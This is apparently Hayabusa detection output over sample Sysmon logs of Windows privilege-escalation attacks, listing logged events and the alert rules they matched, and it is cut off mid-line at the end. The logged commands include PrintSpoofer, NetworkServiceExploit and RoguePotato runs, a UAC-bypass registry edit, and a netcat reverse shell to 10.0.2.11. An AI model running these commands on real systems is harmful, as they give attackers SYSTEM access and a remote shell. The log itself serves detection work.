Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:37.209 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:40.692 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:40.712 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" 
/InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.341 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.402 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.516 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.073 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: 
""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.165 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.965 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:18.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 
747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:21.251 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:21.263 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:26.261 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:08.564 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:18.412 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:19.340 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:19.629 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-02 18:01:52.553 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.855 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: 
C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.863 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.863 +00:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,critical,Evas | 
PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.867 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.867 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 13:13:01.683 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-07 13:13:02.481 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 00:09:36.635 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.647 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 
747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.662 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.709 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:38.023 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:38.023 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:11:16.714 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:11:20.824 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-11 23:21:56.493 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: 
